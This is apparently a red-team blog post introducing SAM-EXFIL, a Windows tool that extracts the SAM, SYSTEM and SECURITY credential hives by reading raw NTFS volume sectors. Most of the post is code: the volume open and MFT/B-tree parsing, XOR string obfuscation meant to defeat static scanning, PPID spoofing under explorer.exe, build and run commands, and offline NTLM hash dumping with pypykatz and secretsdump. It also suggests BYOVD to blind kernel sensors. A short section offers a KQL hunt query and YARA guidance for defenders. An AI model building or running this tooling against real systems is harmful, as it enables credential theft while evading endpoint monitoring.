SAM-EXFIL: Credential Extraction via Raw NTFS Volume Reads


As red teamers regularly operating against mature Windows environments, we frequently encounter endpoint detection and response solutions that monitor access to Windows credential hive files at the API level. The Windows registry hives — SAM, SYSTEM, and SECURITY — are perennial targets during post-exploitation, yet their extraction has become increasingly difficult as EDR vendors have invested heavily in detection coverage for the standard access paths.

This post documents the research and implementation of SAM-EXFIL, a credential extractor that bypasses both file-system locking and EDR API-level hooks by reading the target files directly from the raw NTFS volume, without invoking any file-system API on the credential files themselves. All testing was performed on Windows 10 and Windows 11 with Microsoft Defender enabled in real-time protection mode.


Background

The standard approaches to SAM extraction share a common weakness: they all name the hive, or a copy of it, somewhere in the Windows I/O Manager's file-system stack, where EDR minifilter drivers can match on the path.

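  • reg save and Volume Shadow Copy both end in an operation that names the hive: a registry save request that registry callbacks can observe, or an NtCreateFile call against the hive path inside the snapshot, which is trivially intercepted by a kernel-mode filter.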

  • SeBackupPrivilege with BackupRead still generates file-open events visible to ring-0 sensors.

  • In-memory approaches such as lsadump::sam via Mimikatz require additional privileges and introduce their own detection surface.

The question we sought to answer was whether it is possible to read the credential hives at a layer below the file system, where these interception mechanisms do not apply. The answer, as documented below, is yes — provided the caller holds local Administrator privileges.


The Core Technique

Windows exposes each NTFS volume as a raw block device accessible via the device namespace:

\\.\C:

Opening a handle to this path with GENERIC_READ grants sector-level read access to every byte on the volume. Critically, the open targets the volume device itself rather than a file within it, so the request carries no hive path for a path-based EDR rule to evaluate. The open itself remains visible to kernel sensors, as discussed under Defensive Considerations.

HANDLE hVol = CreateFileA("\\\\.\\C:",
    GENERIC_READ,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    NULL, OPEN_EXISTING,
    FILE_FLAG_NO_BUFFERING, NULL);

With this handle, it becomes possible to parse NTFS on-disk structures entirely in userspace and locate the credential hive files without the operating system's filesystem layer being involved in serving the data.


Implementation

The tool resolves the path Windows\System32\config\SAM (and equivalently SYSTEM and SECURITY) through five discrete stages, each requiring only a small number of sector reads.

Stage 1 — Volume Boot Record

The first sector of the volume contains the NTFS VBR, which provides the geometry parameters required to navigate the filesystem: bytes per sector, sectors per cluster, and the Logical Cluster Number (LCN) at which $MFT begins.

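typedef struct {
    uint8_t  oem_id[8];      // "NTFS    " (on disk at offset 0x03)
    uint16_t bps;            // bytes per sector (on disk at 0x0B)
    uint8_t  spc;            // sectors per cluster (on disk at 0x0D)
    uint64_t mft_lcn;        // $MFT start cluster (on disk at 0x30)
    int8_t   cpfr;           // FILE record size encoding (on disk at 0x40); negative n means 2^|n| bytes
} NTFS_VBR;                  // parsed fields only, not a byte-for-byte overlay of the boot sector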
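As a minimal sketch of how those fields can be pulled out of a sector buffer, the function below reads them at their documented on-disk offsets. The names ntfs_geometry and parse_ntfs_vbr are illustrative and not taken from the tool, and the sketch assumes sectors-per-cluster is stored as a plain count (very large cluster sizes use a different encoding that is not handled here).

```c
#include <stdint.h>
#include <string.h>

/* Parsed geometry. Hypothetical type for illustration only. */
typedef struct {
    uint32_t bytes_per_sector;
    uint32_t bytes_per_cluster;
    uint64_t mft_lcn;           /* first cluster of $MFT */
    uint32_t file_record_size;  /* size of one FILE record in bytes */
} ntfs_geometry;

/* Little-endian readers that avoid unaligned pointer casts. */
static uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint64_t rd64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Returns 0 on success, -1 if the sector does not look like an NTFS VBR. */
static int parse_ntfs_vbr(const uint8_t sector[512], ntfs_geometry *g) {
    if (memcmp(sector + 0x03, "NTFS    ", 8) != 0) return -1;

    uint16_t bps = rd16(sector + 0x0B);
    uint8_t  spc = sector[0x0D];          /* assumed to be a plain count */
    if (bps == 0 || spc == 0) return -1;

    g->bytes_per_sector  = bps;
    g->bytes_per_cluster = (uint32_t)bps * spc;
    g->mft_lcn           = rd64(sector + 0x30);

    /* Positive: clusters per record. Negative n: record is 2^|n| bytes. */
    int cpfr = (int8_t)sector[0x40];
    if (cpfr < 0) {
        if (-cpfr > 31) return -1;
        g->file_record_size = 1u << (unsigned)(-cpfr);
    } else {
        g->file_record_size = (uint32_t)cpfr * g->bytes_per_cluster;
    }
    return 0;
}
```

On a typical volume the record-size byte is 0xF6 (that is, -10), which this decodes to 1024-byte FILE records.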

Stage 2 — $MFT Run-List

Rather than loading the entire Master File Table into memory (it can run to hundreds of megabytes or more on a well-used system drive), we read only record #0 of the MFT, located at byte offset mft_lcn * bytes_per_cluster, and extract the run-list from its non-resident $DATA attribute. Once decoded, this run-list describes the on-disk layout of the MFT as a series of (LCN, cluster_count) pairs, which is all that is needed to address any subsequent MFT record by number.
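On disk, a run-list is a packed sequence of variable-length entries: a header byte whose low nibble gives the size of the length field and whose high nibble gives the size of a signed LCN delta relative to the previous run. The sketch below decodes that encoding from a byte buffer into absolute (LCN, cluster_count) pairs. The ntfs_run type and decode_runlist name are assumptions made for illustration, not the tool's own code.

```c
#include <stddef.h>
#include <stdint.h>

/* One decoded run. lcn == -1 marks a sparse run with no clusters on disk. */
typedef struct {
    int64_t  lcn;
    uint64_t clusters;
} ntfs_run;

/* Decodes up to max_runs runs. Returns the run count, or -1 on malformed input. */
static int decode_runlist(const uint8_t *p, size_t len, ntfs_run *out, int max_runs) {
    size_t  pos = 0;
    int64_t lcn = 0;   /* running absolute LCN; each entry stores a delta */
    int     n   = 0;

    while (pos < len && p[pos] != 0) {        /* 0x00 terminates the list */
        unsigned len_sz = p[pos] & 0x0F;      /* bytes in the length field */
        unsigned off_sz = p[pos] >> 4;        /* bytes in the LCN delta    */
        pos++;
        if (len_sz == 0 || len_sz > 8 || off_sz > 8) return -1;
        if (pos + len_sz + off_sz > len || n == max_runs) return -1;

        uint64_t count = 0;
        for (unsigned i = 0; i < len_sz; i++)
            count |= (uint64_t)p[pos + i] << (8 * i);
        pos += len_sz;

        if (off_sz == 0) {
            out[n].lcn = -1;                  /* sparse: no delta stored */
        } else {
            uint64_t raw = 0;
            for (unsigned i = 0; i < off_sz; i++)
                raw |= (uint64_t)p[pos + i] << (8 * i);
            /* Sign-extend the delta from off_sz bytes to 64 bits. */
            if (off_sz < 8 && (p[pos + off_sz - 1] & 0x80))
                raw |= ~(uint64_t)0 << (8 * off_sz);
            lcn += (int64_t)raw;
            out[n].lcn = lcn;
            pos += off_sz;
        }
        out[n].clusters = count;
        n++;
    }
    return n;
}
```

For example, the bytes 21 18 34 56 00 describe a single run of 0x18 clusters starting at LCN 0x5634.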

Stage 3 — NTFS B-tree Directory Traversal

NTFS directories are indexed as B-trees, with entries sorted by filename. Each directory's MFT record contains a resident $INDEX_ROOT attribute (type 0x90) holding the root node, and optionally a non-resident $INDEX_ALLOCATION attribute (type 0xA0) for overflow nodes stored in 4 KB INDX blocks on disk.

Starting from MFT record #5 (the filesystem root), we descend the tree component by component. At each level, a scan of the sorted entries in the current node either yields the target entry or descends to a child node via the VCN pointer embedded at the tail of each IDX_ENTRY:

static uint64_t search_node(LOOKUP *lk, uint8_t *entries, uint32_t esz) {
    uint32_t off = 0;
    while (off + sizeof(IDX_ENTRY) <= esz) {
        IDX_ENTRY *ie = (IDX_ENTRY *)(entries + off);
        if (ie->flags & IE_END) {
            // descend into rightmost child if present
            if ((ie->flags & IE_NODE) && lk->ia_nruns) {
                int64_t vcn;
                memcpy(&vcn, entries + off + ie->entry_len - 8, 8);
                return follow_vcn(lk, vcn);
            }
            return 0;
        }
        FNAME *fn = (FNAME *)((uint8_t *)ie + sizeof(IDX_ENTRY));
        // name: NUL-terminated copy of the filename held in fn (copy elided in this excerpt)
        int cmp = _wcsicmp(name, lk->target);
        if (cmp == 0) return MFT_REF(ie->file_ref);
        if (cmp > 0) { /* descend left child */ }
        off += ie->entry_len;
    }
    return 0;
}

The full resolution of Windows\System32\config\SAM requires approximately 15–20 sector reads and completes in under one second.

Stage 4 — Update Sequence Array Fix-up

Before any FILE or INDX record can be interpreted, the Update Sequence Array must be applied. NTFS writes a sequence number to the last two bytes of each 512-byte sector within a record before committing it to disk, and stores the original values in the USA at the record header. This must be reversed in memory before parsing attributes:

static void apply_usa(uint8_t *rec, uint16_t usa_off, uint16_t usa_cnt, uint32_t sz) {
    uint16_t *usa = (uint16_t *)(rec + usa_off);
    for (uint16_t i = 1; i < usa_cnt && (uint32_t)(i * 512) <= sz; i++) {
        uint16_t *tgt = (uint16_t *)(rec + i * 512 - 2);
        *tgt = usa[i];
    }
}
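A parser that reads records from a live volume may also want to detect torn writes. The variant below is a sketch under the assumption that the caller has already read usa_off and usa_cnt from the record header (offsets 0x04 and 0x06). It checks that every sector tail still holds the update sequence number before restoring the original bytes, and leaves the buffer untouched on failure. The name apply_usa_checked is hypothetical.

```c
#include <stdint.h>

/*
 * Verifies and applies the Update Sequence Array in place.
 * Returns 0 on success, -1 if the header values are out of bounds or any
 * sector tail does not match the sequence number (a torn or stale record).
 */
static int apply_usa_checked(uint8_t *rec, uint32_t rec_size,
                             uint16_t usa_off, uint16_t usa_cnt) {
    /* usa_cnt counts the sequence number itself plus one entry per sector. */
    if (usa_cnt < 2) return -1;
    if ((uint32_t)usa_off + 2u * usa_cnt > rec_size) return -1;
    if ((uint32_t)(usa_cnt - 1) * 512u > rec_size) return -1;

    const uint8_t *usa = rec + usa_off;   /* usa[0..1] is the sequence number */

    /* Pass 1: every sector tail must carry the sequence number. */
    for (uint16_t i = 1; i < usa_cnt; i++) {
        const uint8_t *tail = rec + (uint32_t)i * 512u - 2;
        if (tail[0] != usa[0] || tail[1] != usa[1]) return -1;
    }

    /* Pass 2: restore the original two bytes of each sector. */
    for (uint16_t i = 1; i < usa_cnt; i++) {
        uint8_t *tail = rec + (uint32_t)i * 512u - 2;
        tail[0] = usa[2 * i];
        tail[1] = usa[2 * i + 1];
    }
    return 0;
}
```

Splitting the work into a verify pass and a restore pass means a record that fails the check can be re-read from disk without first undoing a partial fix-up.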

Stage 5 — Data Extraction

With the target file's MFT record number resolved, we read its $DATA attribute (type 0x80). For non-resident files — which SAM, SYSTEM, and SECURITY invariably are — this yields another run-list describing the file's data clusters. We iterate over these clusters and write the output directly, with optional XOR encryption applied per-byte during the write loop.


OPSEC Hardening

The raw volume read eliminates API-level detection, but a number of additional controls were implemented to reduce the remaining detection surface.

Static String Obfuscation

Analysis of an early build with strings revealed that strings such as \\.\C:, NTFS, SAM, SYSTEM, Windows, and explorer.exe were present in plaintext in the .rdata section, an immediate indicator of the tool's purpose. All sensitive strings are now stored XOR'd with a fixed key (0x13) as byte arrays in the binary, and decoded onto the stack at runtime via a non-inlined function whose key variable is marked volatile, which prevents the compiler from constant-folding the XOR back into plaintext:

static __attribute__((noinline)) void deob(char *s, int n) {
    volatile uint8_t k = 0x13;
    for (int i = 0; i < n; i++) s[i] ^= k;
}

// "\\.\C:" stored as: { 0x4F, 0x4F, 0x3D, 0x4F, 0x50, 0x29 }
OBS(vol_path, 0x4F,0x4F,0x3D,0x4F,0x50,0x29);

Of particular note: GCC at -O2 will evaluate constant XOR expressions at compile time and store the decoded plaintext in .rdata unless volatile is used on the key variable. This was observed during testing and required explicit verification with strings against the compiled binary after each build change.

PPID Spoofing (--ghost)

When invoked with --ghost, the tool relaunches a worker child process with explorer.exe set as the parent via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS. From the perspective of an EDR's process tree telemetry, the credential extraction runs as a child of Explorer rather than of the invoking shell or C2 agent — a considerably less suspicious lineage.

UpdateProcThreadAttribute(attrList, 0,
    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
    &hParent, sizeof(hParent), NULL, NULL);

CreateProcessA(NULL, child_cmd, NULL, NULL, FALSE,
    EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW,
    NULL, NULL, &si.StartupInfo, &pi);

Randomised Output Naming and Encryption (--xor)

With --xor active, each output file is assigned a random GUID-derived name in %TEMP% via CoCreateGuid, and its contents are XOR'd with a single-byte key generated by CryptGenRandom. This prevents the strings SAM, SYSTEM, and SECURITY from appearing as filenames in filesystem event telemetry, and keeps the hive signature out of plain view of automated scanning, although a single-byte XOR is obfuscation rather than encryption and is trivially reversed:

[*] XOR key: 0xA3
[*] Decrypt: python -c "k=0xA3;import sys;sys.stdout.buffer.write(bytes(b^k for b in open(sys.argv[1],'rb').read()))" <file> > SAM
[+] SAM      → C:\Users\rtx\AppData\Local\Temp\3F8A1C2D04B2.tmp
[+] SYSTEM   → C:\Users\rtx\AppData\Local\Temp\7D2E9F1A03C1.tmp
[+] SECURITY → C:\Users\rtx\AppData\Local\Temp\1A4B6E8C02D3.tmp

Defensive Considerations

It should be noted that while this technique bypasses user-mode API hooks and file-system-level monitoring, it does not bypass kernel-mode endpoint sensors. Drivers such as CrowdStrike Falcon's kernel sensor operate as minifilter drivers and intercept I/O Request Packets at the IRP_MJ_CREATE level, which includes raw volume device opens regardless of whether a file path is specified.

Defenders with kernel-mode telemetry can hunt for this technique using the following pattern: a process that is not a recognised system process opens a handle to a volume device (\\.\C:, \\.\D:, etc.), followed within a short window by the creation of temporary files in %TEMP%. In KQL:

DeviceEvents
| where ActionType == "CreateFile"
| where FolderPath matches regex @"\\\\\.\\[A-Za-z]:"
| where InitiatingProcessFileName !in~ ("svchost.exe", "MsMpEng.exe", "System")
| project Timestamp, DeviceName, InitiatingProcessFileName,
          InitiatingProcessParentFileName, InitiatingProcessCommandLine

The PPID spoofing will cause InitiatingProcessParentFileName to report explorer.exe; correlating on the raw volume open event rather than relying solely on process lineage is therefore the more reliable detection approach.

For defenders without kernel telemetry, a YARA rule targeting the XOR-obfuscated byte sequences for \\.\C: and NTFS alongside the deobfuscation loop structure provides reasonable coverage against the compiled binary.
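To build such a rule, the encoded byte sequences can be derived from the plaintext and the key. The helper below is a small sketch for defenders: it prints the XOR-encoded form of a string as space-separated hex, ready to paste into a YARA hex string. It assumes the fixed key 0x13 described earlier, which a rebuilt binary could easily change. The name xor_hex_pattern is illustrative.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Writes the XOR-encoded bytes of `s` into `out` as uppercase hex pairs
 * separated by single spaces. Returns the number of characters written
 * (excluding the terminator), or -1 if `out` is too small.
 */
static int xor_hex_pattern(const char *s, unsigned char key,
                           char *out, size_t out_sz) {
    size_t n = strlen(s);
    size_t pos = 0;

    if (n == 0) {
        if (out_sz == 0) return -1;
        out[0] = '\0';
        return 0;
    }
    /* Each byte needs "XX" plus a separator or the final terminator. */
    if (out_sz < n * 3) return -1;

    for (size_t i = 0; i < n; i++) {
        unsigned v = (unsigned)((unsigned char)s[i] ^ key);
        pos += (size_t)snprintf(out + pos, out_sz - pos,
                                i ? " %02X" : "%02X", v);
    }
    return (int)pos;
}
```

With key 0x13, the volume path \\.\C: encodes to 4F 4F 3D 4F 50 29, matching the byte array shown in the obfuscation section, and NTFS encodes to 5D 47 55 40.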


Demonstration

The tool running against a Windows 11 host with Microsoft Defender real-time protection enabled — SAM (128 KB), SYSTEM (21 MB), and SECURITY (64 KB) extracted cleanly:

Credential hashes recovered offline on Kali using pypykatz, showing NTLM hashes for all local accounts, LSA secrets, and DPAPI machine keys:


Usage

# Build (GCC / MinGW)
gcc -O2 -Wall -s -fno-asynchronous-unwind-tables \
    -o build/sam-exfil.exe mft-stealth2.c -lole32 -ladvapi32

# Standard extraction (Administrator required)
sam-exfil.exe --output C:\out

# With PPID spoofing and encrypted output
sam-exfil.exe --output C:\out --ghost --xor

# Offline parsing
pypykatz registry SYSTEM --sam SAM --security SECURITY
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

Limitations

This technique requires local Administrator privileges; the raw volume open is rejected by the kernel for unprivileged callers. Additionally, BitLocker only stays out of the way while the volume is unlocked: on a running system, reads through \\.\C: are decrypted transparently, but where the volume key is not present in memory (offline or pre-boot scenarios), the raw sectors will be ciphertext and the output will be unusable.

As noted above, kernel-mode endpoint sensors will observe the volume device open. The techniques described here are assessed to provide meaningful reduction in detection fidelity against user-mode-only EDR configurations, while offering a more modest improvement against mature, kernel-instrumented deployments. For higher-assurance engagements, porting this logic to a BOF (Beacon Object File) executing within the C2's trusted process context, or combining it with a BYOVD approach to temporarily blind the kernel sensor, would be the natural next step.


Source Code

The full source code, build scripts, and usage documentation are available on GitHub:

https://github.com/marcocarolasec/SAM-EXFIL


References

  • Workday Engineering — Leveraging Raw Disk Reads to Bypass EDR

  • libyal/libfsntfs — New Technologies File System (NTFS) format specification

  • skelsec/pypykatz — Offline registry hive parser

  • fortra/impacket — secretsdump.py offline credential extraction
